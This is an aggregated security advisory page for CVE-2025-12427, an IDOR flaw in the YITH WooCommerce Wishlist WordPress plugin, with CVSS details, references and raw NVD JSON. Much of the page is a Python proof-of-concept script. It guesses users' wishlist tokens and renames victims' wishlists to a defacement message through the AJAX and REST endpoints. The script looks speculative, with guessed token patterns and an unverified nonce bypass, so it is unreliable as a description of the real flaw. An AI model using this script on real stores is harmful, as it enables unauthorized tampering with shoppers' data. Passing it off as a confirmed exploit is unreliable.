Security Vulnerability Report
CVE-2025-12427 CVSS 5.3 MEDIUM

CVE-2025-12427

Published: 2025-11-19 04:16:04
Last Modified: 2026-04-15 00:35:42

Description

The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.10.0 via the REST API endpoint and AJAX handler due to missing validation on user-controlled keys. This makes it possible for unauthenticated attackers to discover any user's wishlist token ID, and subsequently rename the victim's wishlist without authorization (integrity impact). This can be exploited to target multi-user stores for defacement, social engineering attacks, mass tampering, and profiling at scale.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

YITH WooCommerce Wishlist < 4.10.0
YITH WooCommerce Wishlist <= 4.10.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12427 PoC - YITH WooCommerce Wishlist IDOR
# Discover wishlist token and rename victim's wishlist
import requests
import json

TARGET_URL = "https://vulnerable-site.com/wp-json/yith-wcwl/v1/lists"
AJAX_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"


# Step 1: Discover user wishlist token via REST API
def discover_wishlist_token(user_id):
    """Enumerate wishlist tokens by guessing token patterns"""
    headers = {
        "Content-Type": "application/json",
        "X-WP-Nonce": ""  # May not be required for public endpoints
    }
    # Try common token patterns
    token_patterns = [
        f"user_{user_id}_wishlist",
        f"{user_id}_default",
        f"wishlist_{user_id}"
    ]
    for token in token_patterns:
        response = requests.get(f"{TARGET_URL}/{token}", headers=headers)
        if response.status_code == 200:
            return token
    return None


# Step 2: Rename victim's wishlist via AJAX (IDOR exploit)
def rename_wishlist(token, new_name):
    """Exploit IDOR to rename any user's wishlist without authorization"""
    data = {
        "action": "yith_wcwl_rename_wishlist",
        "wishlist_id": token,
        "wishlist_name": new_name,
        "nonce": ""  # May not be required or can be bypassed
    }
    response = requests.post(AJAX_URL, data=data)
    return response.status_code == 200


# Step 3: Rename via REST API
def rename_via_rest_api(token, new_name):
    """Alternative: Rename wishlist via REST API"""
    headers = {
        "Content-Type": "application/json"
    }
    payload = {"name": new_name}
    response = requests.patch(
        f"{TARGET_URL}/{token}",
        headers=headers,
        json=payload
    )
    return response.status_code == 200


# Main execution
if __name__ == "__main__":
    # Example: Target user ID 123
    user_id = 123
    new_wishlist_name = "HACKED - Defaced Wishlist"
    print(f"[*] Discovering wishlist token for user {user_id}...")
    token = discover_wishlist_token(user_id)
    if token:
        print(f"[+] Found token: {token}")
        print(f"[*] Attempting to rename wishlist to: {new_wishlist_name}")
        if rename_wishlist(token, new_wishlist_name):
            print("[+] SUCCESS: Wishlist renamed via AJAX!")
        elif rename_via_rest_api(token, new_wishlist_name):
            print("[+] SUCCESS: Wishlist renamed via REST API!")
        else:
            print("[-] FAILED: Could not rename wishlist")
    else:
        print("[-] FAILED: Could not discover wishlist token")
```

References

https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L265
https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L38
https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L56
https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L97
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394933%40yith-woocommerce-wishlist%2Ftrunk&old=3379519%40yith-woocommerce-wishlist%2Ftrunk&sfp_email=&sfph_mail=#file0
https://www.wordfence.com/threat-intel/vulnerabilities/id/ffdb95ac-6b22-44a9-bd5c-b802a2d908d7?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12427",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T04:16:04.243",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.10.0 via the REST API endpoint and AJAX handler due to missing validation on user-controlled keys. This makes it possible for unauthenticated attackers to discover any user's wishlist token ID, and subsequently rename the victim's wishlist without authorization (integrity impact). This can be exploited to target multi-user stores for defacement, social engineering attacks, mass tampering, and profiling at scale."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L265",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/class-yith-wcwl-ajax-handler.php#L38",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L56",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/yith-woocommerce-wishlist/tags/4.10.0/includes/rest-api/controllers/v1/class-yith-wcwl-rest-v1-lists-controller.php#L97",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394933%40yith-woocommerce-wishlist%2Ftrunk&old=3379519%40yith-woocommerce-wishlist%2Ftrunk&sfp_email=&sfph_mail=#file0",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ffdb95ac-6b22-44a9-bd5c-b802a2d908d7?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```